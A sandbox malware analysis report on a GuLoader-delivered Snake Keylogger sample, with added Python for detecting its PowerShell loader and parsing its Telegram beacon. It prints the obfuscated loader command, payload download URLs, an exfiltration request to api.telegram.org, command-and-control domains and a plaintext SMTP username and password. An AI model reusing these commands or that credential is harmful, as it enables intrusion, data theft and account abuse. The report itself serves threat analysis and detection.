Windows Analysis Report
HVSU7GbA5N.exe

Overview

General Information

Sample name: HVSU7GbA5N.exe (renamed because the original name is a hash value)
Original sample name: 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Analysis ID: 1586021
MD5: 9eeaa6c9ce625021ac21b5eb40fb73e7
SHA1: 459fa22834028579136aebd1327a6ff8b6e654cb
SHA256: 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739
Tags: exe, user-adrian__luca

Detection

GuLoader, Snake Keylogger
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • HVSU7GbA5N.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\HVSU7GbA5N.exe" MD5: 9EEAA6C9CE625021AC21B5EB40FB73E7)
    • powershell.exe (PID: 7644 cmdline: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware configuration (Snake Keylogger, extracted from msiexec.exe memory):
{"Exfil Mode": "SMTP", "Username": "juanantonio@autorecambiosjuanjose.com", "Password": "JA-*2020antonio", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | -
00000002.00000002.2032574742.000000000A644000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | -
Process Memory Space: msiexec.exe PID: 3504 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
Process Memory Space: msiexec.exe PID: 3504 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | -

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7644, TargetFilename: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)", CommandLine: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HVSU7GbA5N.exe", ParentImage: C:\Users\user\Desktop\HVSU7GbA5N.exe, ParentProcessId: 7576, ParentProcessName: HVSU7GbA5N.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)", ProcessId: 7644, ProcessName: powershell.exe
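The PowerShell command line recorded above never names the cmdlet it runs: it reads the dropped Sprngningen178.Gte file as one string, slices a three-character token out of it at offset 73884 and dot-invokes that token with the whole file as its argument, so the command is only visible once the file itself is carved. The report does not show the file's content, so which token it is stays unknown here. The Python below is an added example, not part of the Joe Sandbox report, that scores process-creation command lines for this loader pattern and reports the path, offset and length an analyst would need to carve; the first command line is the one from this report, the other two (a benign Get-Content -Raw and an & $var variant of the same trick) are constructed.

```python
import re

# Process-creation command lines to score. The first is the one the report records
# for PID 7644; the other two are constructed for this example (a benign use of
# Get-Content -Raw, and a variant of the same loader trick using & instead of dot-sourcing).
SAMPLE_CMDLINES = [
    "\"powershell.exe\" -windowstyle minimized \"$Delfisk=Get-Content -Raw "
    "'C:\\Users\\user\\AppData\\Local\\Chillum19\\rustiness\\attacheringens\\Sprngningen178.Gte';"
    "$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)\"",
    "powershell.exe -NoProfile -Command \"Get-Content -Raw C:\\ops\\config.json | ConvertFrom-Json\"",
    "powershell.exe -w hidden \"$d=[IO.File]::ReadAllText('C:\\Users\\Public\\x.dat');"
    "$c=$d.Substring(91,3);& $c $d\"",
]

RULES = {
    # a 1-4 character command name sliced out of a string at a fixed offset, e.g. $x.SubString(73884,3)
    "substring_cmd": re.compile(r"\.\s*substring\s*\(\s*(\d+)\s*,\s*([1-4])\s*\)", re.I),
    # invocation of a command whose name lives in a variable: .$var(...) or & $var ...
    "variable_invoke": re.compile(r"(?:\.|&)\s*\$[A-Za-z_]\w*\s*(?:\(|\$)"),
    # whole-file read into a variable
    "raw_read": re.compile(r"get-content\s+-raw|\[io\.file\]::readalltext", re.I),
    # console hidden or minimized from the user
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|minimized)", re.I),
}

# first Windows path on the command line, quoted or not
PATH_RE = re.compile(r"([A-Za-z]:\\[^\s'\";|)]+)")


def analyze(cmdline: str) -> dict:
    """Score one command line; returns the rules hit plus what to carve from the file."""
    hits = {name: rx.search(cmdline) for name, rx in RULES.items()}
    matched = [name for name, m in hits.items() if m]
    path = PATH_RE.search(cmdline)
    offset = length = None
    if hits["substring_cmd"]:
        offset = int(hits["substring_cmd"].group(1))
        length = int(hits["substring_cmd"].group(2))
    return {
        "matched": matched,
        "path": path.group(1) if path else None,
        "offset": offset,
        "length": length,
        # the pair that defines this loader: a command name carved out of a blob, then invoked
        "suspicious": "substring_cmd" in matched and "variable_invoke" in matched,
    }


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        r = analyze(cmd)
        tag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{tag:10} rules={r['matched']} carve={r['path']}@{r['offset']}+{r['length']}")
```

The verdict deliberately rests on the pair substring_cmd plus variable_invoke rather than on any single regex: Get-Content -Raw and a minimized window are common in legitimate automation, but a command name carved out of a data file and then invoked through a variable is not. With the dropped .Gte file in hand, the token is simply the bytes at the reported offset and length.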
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T16:21:25.392730+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | TCP
2025-01-08T16:21:30.188459+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 188.114.97.3 | 443 | TCP
2025-01-08T16:21:23.621820+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:24.809363+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:26.293753+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49714 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:28.012490+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49716 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:18.656695+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 142.250.184.238 | 443 | TCP
2025-01-08T16:21:36.997539+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49728 | 149.154.167.220 | 443 | TCP

AV Detection

Source: http://varders.kozow.com:8081 | Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081 | Avira URL Cloud: Label: phishing
Source: http://anotherarmy.dns.army:8081 | Avira URL Cloud: Label: phishing
Source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "juanantonio@autorecambiosjuanjose.com", "Password": "JA-*2020antonio", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe | ReversingLabs: Detection: 31%
Source: HVSU7GbA5N.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: HVSU7GbA5N.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: HVSU7GbA5N.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: e.pdb0:lp | source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb53 | source: powershell.exe, 00000002.00000002.2011151339.0000000003575000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s\System.Core.pdbw,l | source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00405EC1 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00402645 FindFirstFileA
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then jmp 02D5F45Dh | 9_2_02D5F2C0

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49728 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (7 requests)
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org (2 requests)
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 142.250.184.238:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive (6 requests)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (4 requests)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 08 Jan 2025 15:21:36 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
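The 404 above arrives at 15:21:36 GMT, the same second as the Suricata "Telegram Send Message" alert (16:21:36 +0100), and is consistent with Telegram's reply to a /bot/sendMessage request whose bot token is empty: the path goes straight from /bot to /sendMessage and chat_id is blank too. That matches the extracted configuration, which names SMTP, not Telegram, as the exfiltration channel, so the Telegram beacon carries no data anywhere. The Python below is an added example, not part of the Joe Sandbox report, that parses a captured request of this shape, percent-decodes the beacon text into its fields and states whether the channel is usable; the first request is assembled from the lines recorded above, the second (with a fake token and chat_id) is constructed only to exercise the other branch.

```python
import re
from urllib.parse import parse_qs

# The request as recorded in the report (request line, Host and Connection headers),
# joined into one raw HTTP message for this example. Note the empty bot token
# (/bot/ followed directly by the method) and the empty chat_id.
SAMPLE_REQUEST = (
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:"
    "%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A"
    "[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20"
    "the%20system%20storage's%20empty.%20] HTTP/1.1\r\n"
    "Host: api.telegram.org\r\n"
    "Connection: Keep-Alive\r\n"
)

# Constructed counter-example with a (fake) token and chat_id filled in.
SAMPLE_LIVE = (
    "GET /bot123456:FAKETOKEN/sendMessage?chat_id=42&text=PC%20Name:test HTTP/1.1\r\n"
    "Host: api.telegram.org\r\n"
)

BOT_PATH = re.compile(r"/bot([^/]*)/(\w+)")


def parse_telegram_beacon(raw: str) -> dict:
    """Extract token presence, chat_id and the decoded message fields from a captured request."""
    request_line, *headers = raw.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    host = next((h.split(":", 1)[1].strip() for h in headers if h.lower().startswith("host:")), "")
    path, _, query_string = target.partition("?")
    m = BOT_PATH.fullmatch(path)
    token, api_method = (m.group(1), m.group(2)) if m else ("", "")
    query = parse_qs(query_string, keep_blank_values=True)   # also percent-decodes the values
    text = query.get("text", [""])[0]
    fields = {}
    for line in (ln.strip() for ln in text.split("\r\n")):
        # "Key: value" lines carry the host profile; the bracketed line is free text
        if ":" in line and not line.startswith("["):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {
        "host": host,
        "api_method": api_method,
        "token_present": bool(token),
        "chat_id": query.get("chat_id", [""])[0],
        "fields": fields,
        "message": text.strip(),
    }


def triage(beacon: dict) -> str:
    """Say whether the Telegram channel can actually carry data."""
    if beacon["host"] != "api.telegram.org":
        return "not-telegram"
    if not beacon["token_present"] or not beacon["chat_id"]:
        # the API cannot route this; a 404 like the one captured above is the expected reply
        return "telegram-exfil-misconfigured"
    return "telegram-exfil-live"


if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, SAMPLE_LIVE):
        b = parse_telegram_beacon(raw)
        print(triage(b), b["fields"])
```

The decoded fields (PC Name, Date and Time, Country Name) are what the sample learned from checkip.dyndns.org and reallyfreegeoip.org moments earlier, which is why those lookups and the Telegram call belong to one behaviour chain when writing detections; the empty token is the reason the Suricata anomaly fires without any data leaving the host over this channel.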
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2010747235.0000000003408000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft(
Source: HVSU7GbA5N.exe, HVSU7GbA5N.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: HVSU7GbA5N.exe, HVSU7GbA5N.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.csU
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000009.00000002.2665789154.000000002322E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000009.00000002.2665789154.0000000023229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enp
Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2664768454.0000000022610000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI
Source: msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NIN
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/#
Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=downloadT
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=downloads
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000009.00000002.2665789154.00000000230BB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002312B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
